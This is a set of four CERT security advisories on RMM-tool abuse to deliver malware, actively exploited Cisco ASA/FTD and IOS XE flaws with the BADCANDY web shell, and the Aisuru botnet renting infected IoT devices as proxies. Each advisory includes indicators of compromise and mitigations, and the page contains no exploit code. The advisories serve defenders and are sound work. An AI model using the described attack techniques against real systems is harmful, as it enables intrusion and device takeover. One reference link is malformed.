Advisory ID: NCC-CSIRT-2025-025

Summary: 

Cybercriminals are abusing trusted Remote Monitoring & Management (RMM) tools, notably LogMeIn/GoTo Resolve and PDQ Connect, to disguise malware as legitimate programs. Attackers distribute seemingly normal installers (hosted on convincing websites or delivered via phishing) that install RMM agents (or leverage their installers) and then deploy secondary malicious payloads, granting attackers remote control and persistence while blending in with legitimate administrative software.

Damage/Probability: High/High

Indicators of Compromise (IOCs): 

• Fake download URLs/domains posing as legitimate vendor pages.
• MSI files mimicking PDQ Connect/LogMeIn installers that trigger unusual outbound activity.
• Unauthorized RMM agents installed on endpoints.
• Outbound C2 or remote-access connections appearing soon after an RMM agent is installed.

Product(s): 

• LogMeIn/GoTo Resolve – remote access and support tool.
• PDQ Connect – remote software deployment and management tool.
• Other RMM tools (e.g., ScreenConnect, SimpleHelp, ConnectWise) were used in similar attacks.

Version(s): 

Not version-specific, it affects environments where RMM agents can be installed or coerced into running with administrative privileges. Confirm vendor-specific advisories for the exact affected builds.

Platform(s): 

• Windows Endpoints
• Servers
• Corporate Workstations
• Unmanaged systems where RMM agents are installed or can be side-loaded.

Description: 

Recent incidents show attackers hosting convincing “software” pages or sending phishing lures that cause victims to download and run installers which either: (a) install legitimate RMM agents (PDQ Connect MSI, LogMeIn/GoTo Resolve installers) that the attacker controls or misuses; or (b) bundle an RMM installer together with a secondary malicious payload. Once the RMM agent is present with elevated privileges, the attacker uses the tool’s remote-access and management features to move laterally, execute arbitrary commands, and persist. In several reported cases, the final payloads included information-stealers and remote access frameworks. Security vendors, including AhnLab and IBM X-Force, have published analyses describing the distribution patterns and attack chains.

Notable operational details observed across reports: vendors’ legitimate agents (or their installers) are often used to lower suspicion; MSI installers are a recurring delivery artefact; attackers may combine social engineering (fake update/meeting invites) with poisoned landing pages; and sectors affected include logistics, transportation, and enterprise services.

Threat Types: 

• Use of legitimate RMM tools for initial access and persistence.
• Delivery of malware through fake vendor sites or compromised installers.
• Full remote control or code execution once the RMM agent runs with admin privileges.
• Data theft, lateral movement, and deployment of additional tools (e.g., Cobalt Strike).

Impacts: 

• Attackers gain remote admin control, allowing full system access, credential theft, and further malware deployment.
• Compromise of operational environments where RMM is common, enabling fraud, manipulation, or service disruption.
• Malicious actions blend with legitimate RMM activity, evading detection and bypassing simple allow-lists.

Solutions:  

NCC-CSIRT recommend the following mitigation steps:

• Track all RMM installations and alert on any unauthorized agents.
• Detect installers creating new services or persistence.
• Monitor for abnormal remote-management activity or connections.
• Use EDR to flag suspicious installer-to-agent process chains.
• Block malicious installers and sandbox MSI files before approval.
• Treat any unexpected RMM installation as a high-priority incident.
• Enforce strict change-control and approvals for RMM tools.
• Include RMM-abuse scenarios in tabletop and IR playbooks.
• Work with vendors to verify installer integrity and monitor distribution channels.
• Use application allow-listing and require admin approval for new RMM tools.
• Keep an approved RMM vendor list and continuously monitor remote-access channels.

References:

• https://cybersecuritynews.com/hackers-exploiting-rmm-tools-logmein-and-pdq-connect/

• https://asec.ahnlab.com/en/90968/

• https://exchange.xforce.ibmcloud.com/osint/guid:bf65bd6af1cb45939d562c07edd316ae

• https://www.cyber.nj.gov/Home/Components/News/News/1771/214

• https://simplysecuregroup.com/hackers-exploiting-rmm-tools-logmein-and-pdq-connect-to-deploy-malware-as-a-normal-program/

• https://www.thaicert.or.th/en/2025/11/05/hackers-use-remote-monitoring-and-management-rmm-tools-to-breach-transportation-companies-and-control-cargo-shipments/

• https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics 

Advisory ID: NCC-CSIRT-2025-024

Summary: 

Cisco has warned of a new attack variant exploiting two zero-day flaws, CVE-2025-20333 and CVE-2025-20362, in ASA and FTD VPN/Web interfaces, enabling unauthenticated RCE (Remote Code Execution), unauthorized access, and persistent DoS attacks through continuous device reloads. The campaign, active since May 2025, leverages advanced malware like RayInitiator and LINE VIPER to achieve persistence and evade detection. CISA and allied CERTs have classified the vulnerabilities as actively exploited, urging organizations to apply patches immediately, perform forensic checks (core-dumps), and restrict or rebuild compromised systems.

Damage/Probability: Critical/High

CVE(s): CVE-2025-20333 and CVE-2025-20362

Product(s): 

• Cisco Secure Firewall Adaptive Security Appliance (ASA) Software
• Cisco Secure Firewall Threat Defense (FTD) Software
• Affected management interfaces: VPN/WebVPN (HTTP/HTTPS) services and related web UI components

Version(s): 

Releases of ASA and FTD containing the VPN/Web server components affected by CVE-2025-20333 and CVE-2025-20362 before Cisco’s published fixes. (Confirm exact build numbers via Cisco Security Advisory.)

Platform(s): 

• Enterprise and service-provider perimeter/firewall appliances (on-premises ASA hardware
• ASAv virtual appliance
• Firepower/FTD deployments, especially devices exposing VPN web interfaces to the internet

Description: 

Two related vulnerabilities disclosed in late September 2025, CVE-2025-20333 (a critical buffer-overflow/RCE in the VPN/Web server) and CVE-2025-20362 (an authorization bypass exposing restricted endpoints), have been weaponized in active campaigns. Attackers have chained these issues to execute arbitrary code as root on vulnerable ASA/FTD devices, create backdoor accounts, disable or adulterate logging, and, in the newest variant, intentionally trigger firmware reloads, producing persistent DoS conditions. Reports indicate the campaign is an evolution of the ArcaneDoor/Storm-1849 activity observed in 2024 and has delivered multiple malware strains (including RayInitiator and LINE VIPER) to affected devices.

Investigations show large numbers of internet-connected ASA/FTD devices remained unpatched as of late September 2025, providing a wide attack surface. In several cases, devices showed signs of tampering that complicate removal (e.g., persistence mechanisms beyond simple file remnants). Authorities recommend treating any evidence of compromise as serious and following forensic guidance (core dumps and coordinated analysis).

Impacts: 

• Full administrative compromise
• Persistent backdoors (firmware tampering)
• Network outages via forced reboot loops
• Lateral movement into protected networks.

Solutions:  

NCC-CSIRT recommend the following mitigation steps:

• Apply Cisco patches for CVE-2025-20333 and CVE-2025-20362 on all ASA/ASAv/FTD devices.
• Follow CISA ED-25-03 and rebuild any compromised or tampered devices.
• Disable unused WebVPN/admin interfaces and restrict management access.
• Rotate admin credentials, review logs, and monitor for new privileged accounts.
• Hunt for anomalies like reload loops, cleared logs, or unknown connections.
• Strengthen logging, SIEM monitoring, and alerts for unusual activities.
• Replace unsupported or legacy ASA devices lacking Secure Boot protections.
• Restrict or disable internet-facing VPN interfaces and monitor for attacks.
• Perform forensic checks for implants and coordinate with CERT or Cisco IR.

References:

• https:/hell/#google_vignette

• https://www.theregister.com/2025/11/06/cisco_firewall_ongoing_attacks/

• https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB

• https://www.theregister.com/2025/11/06/cisco_firewall_ongoing_attacks/

• https://www.cybersecuritydive.com/news/cisco-firewall-attack-variant-arcanedoor/805116/

• https://www.bleepingcomputer.com/news/security/cisco-actively-exploited-firewall-flaws-now-abused-for-dos-attacks/

Advisory ID: NCC-CSIRT-2025-023

Summary: 

The Australian Signals Directorate (ASD) has issued an alert on BADCANDY, a malicious implant actively exploiting a critical Cisco IOS XE vulnerability (CVE-2023-20198, CVSS 10.0). The exploit allows remote attackers to gain full administrative control of Cisco routers and switches without authentication. Once compromised, attackers deploy a Lua-based backdoor (BADCANDY) to execute commands, hide traces, and maintain control of affected systems.

Over 400 devices have been compromised globally since July 2025, with active infections reported across telecommunications and internet service networks. The persistence and global spread of this campaign raise concerns that similar attacks could target telecommunication infrastructure in West Africa, including Nigeria, due to the widespread deployment of Cisco IOS XE devices in the region.

Damage/Probability: Critical/High

Product(s): 

• Cisco IOS XE Software (web user interface / HTTP/HTTPS server features)
• Cisco routers and switches running IOS XE with the exposed Web UI feature
• Network edge infrastructure used by Telecom Operators, ISPs, and Government Agencies

Version(s): 

All versions of Cisco IOS XE Software before the official patch for CVE-2023-20198.

Platform(s): 

Edge routers and switches in enterprise, government, and service-provider networks, particularly those with Internet-exposed Web UI features.

Description: 

Attackers exploit the Cisco IOS XE Web UI feature to create a privileged (level 15) account, granting full administrative rights. They then deploy the BADCANDY implant, a Lua-based web shell that executes arbitrary commands and hides malicious configuration changes.

The implant may be removed upon reboot, but attackers can regain access through previously created accounts or re-exploitation of the same vulnerability. Repeated compromises have been observed globally, confirming active and automated scanning for unpatched devices.

Technical indicators include:

• Presence of unknown or unauthorized level 15 privileged accounts (e.g., cisco_tac_admin, cisco_support, or random names).
• Unfamiliar tunnel interfaces or modified routing configurations.
• Unexpected HTTP/HTTPS access to IOS XE management ports from the Internet.
• Logs showing configuration changes outside maintenance windows.

Impacts: 

• Full takeover of routers and switches, allowing interception of traffic, rerouting, and installation of additional malware.
• Data exfiltration and espionage on telecom backbones and enterprise networks.
• Reinfection risk, as ASD confirmed that unpatched devices may be compromised repeatedly even after malware removal.
• Service disruption or manipulation of routing tables, posing significant operational and regulatory risks for telecom operators and ISPs.
• Potential spillover to national networks, as similar tactics could be used against Government communication backbones or critical national infrastructure.

Solutions:  

NCC-CSIRT recommend the following mitigation steps:

• Conduct an immediate security audit of all Cisco IOS XE routers, particularly those with public IP interfaces.
• Immediate patching: Apply Cisco’s official patch for CVE-2023-20198 on all affected IOS XE devices.
• Reboot and harden: Reboot patched devices to clear the implant, then disable the Web UI (IP http server / IP http secure server) unless strictly necessary.
• Account and configuration audit:
• Review all admin-level accounts.
• Remove unknown or unauthorized users.
• Inspect tunnel and interface configurations.
• Restrict access:
• Block HTTP/HTTPS management ports (TCP/80 and 443) from public access.
• Limit administrative access to internal management networks or VPN.
• Implement continuous monitoring:
• Enable AAA logging for configuration changes.
• Use SIEM tools to detect new accounts or altered configurations.
• Apply Cisco hardening guidelines for IOS XE devices used in telecom and enterprise environments.
• Network segmentation: Isolate management interfaces from operational traffic.

References:

• https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ios-webui-HfwnRgk

• https://www.bleepingcomputer.com/news/security/australia-warns-of-badcandy-infections-on-unpatched-cisco-devices/

• https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/badcandy

•  

  https://thehackernews.com/2025/11/asd-warns-of-ongoing-badcandy-attacks.html

• https://securityaffairs.com/184095/hacking/badcandy-webshell-threatens-unpatched-cisco-ios-xe-devices-warns-australian-government.html

•  

  https://cybersecuritynews.com/cisco-ios-xe-badcandy-web-shell/#google_vignette

•  

  https://cyberpress.org/badcandy-web-shell/

•  

  https://research.splunk.com/web/07c36cda-6567-43c3-bc1a-89dff61e2cd9/

• https://itsecuritynewsbox.com/index.php/2025/11/01/badcandy-webshell-threatens-unpatched-cisco-ios-xe-devices-warns-australian-government/

Advisory ID: NCC-CSIRT-2025-022

Summary: 

Security researchers report that the Aisuru botnet, a powerful Mirai/TurboMirai-class IoT botnet behind multiple record-scale DDoS attacks in 2025, has been retooled from covert DDoS operations into a profitable residential-proxy service model. Instead of solely launching volumetric attacks, Aisuru operators are now renting access to hundreds of thousands of compromised IoT devices as residential proxies, enabling customers (criminal and legitimate alike) to anonymize and route traffic through infected home devices. This pivot enhances the botnet’s longevity and profitability while making malicious traffic more difficult to attribute and block.

Damage/Probability: Critical/High

Product(s): 

• Consumer and small-office/home (SOHO) routers and gateways
• Internet of Things (IoT) devices (IP cameras, DVRs, home gateways, routers)
• Residential broadband CPE and unmanaged devices

Version(s): 

Not version-specific, affects a wide range of unpatched/poorly secured IoT firmware and consumer router firmware versions.

Platform(s): 

• Home and small-office networks
• ISP access networks
• Proxy resale marketplaces that can consume residential proxy capacity.

Description: 

Aisuru is a Mirai-family/TurboMirai-class botnet that has previously been observed launching record-breaking DDoS attacks by enlisting large numbers of insecure IoT devices. Recent telemetry and reporting indicate the operator(s) have added modules and management infrastructure to enable proxy services on infected devices. Compromised devices are exposed as SOCKS/HTTP proxies or otherwise configured to relay arbitrary traffic for paying customers. The botnet retains high-volume DDoS capabilities but now offers a lower-visibility revenue stream, residential proxy rentals, which is attractive to a broad range of cybercriminal activities, including credential stuffing, ad fraud, web scraping, and evading geofencing or content takedowns.

Technical indicators observed across vendor telemetry include unusual outbound connections on proxy ports to customer controllers, persistent processes or scripts on consumer CPE performing proxying, rotation of proxy endpoints to avoid IP blocks, and reuse of known Mirai-style infection vectors (default/weak credentials, exposed administrative interfaces). Netscout/ASERT and other industry teams reported significant outbound DDoS traffic originating from end-customer devices earlier in 2025 and have documented the observable shift in operator behaviour toward proxy monetization.

Impacts: 

• Large, persistent pools of geographically diverse residential IPs for criminals to anonymize and scale malicious campaigns (fraud, credential stuffing, ad-fraud, scraping).
• Increased difficulty for defenders and law enforcement to attribute malicious activity because traffic originates from legitimate residential IP addresses.
• Continued capability to mount massive DDoS attacks when operators choose to, while also monetizing assets via proxy rentals.
• Operational impact on ISPs and customers: bandwidth saturation, degraded service, and reputational exposure of affected subscribers.

Solutions:  

NCC-CSIRT recommend the following mitigation steps:

• Monitor CPE for unusual outbound connections or proxy port activity (1080, 3128, 8080).
• Detect abnormal high-volume upstream traffic and excessive concurrent sessions.
• Use threat intelligence (e.g., Netscout ASERT, X-Lab) to identify Aisuru indicators.
• Block or throttle connections to known C2 and proxy domains.
• Push firmware updates and advise customers to secure or replace vulnerable IoT devices.
• Enforce strong authentication (MFA, rate limits) and monitor for proxy-like traffic patterns.

References:

• https://krebsonsecurity.com/2025/10/aisuru-botnet-shifts-from-ddos-to-residential-proxies/

• https://www.netscout.com/blog/asert/asert-threat-summary-aisuru-and-related-turbomirai-botnet-ddos

• https://securityaffairs.com/183969/malware/aisuru-botnet-is-behind-record-20tb-sec-ddos-attacks.html

• https://www.securityweek.com/turbomirai-class-aisuru-botnet-blamed-for-20-tbps-ddos-attacks/

• https://www.csoonline.com/article/4071594/aisurus-30-tbps-botnet-traffic-crashes-through-major-us-isps.html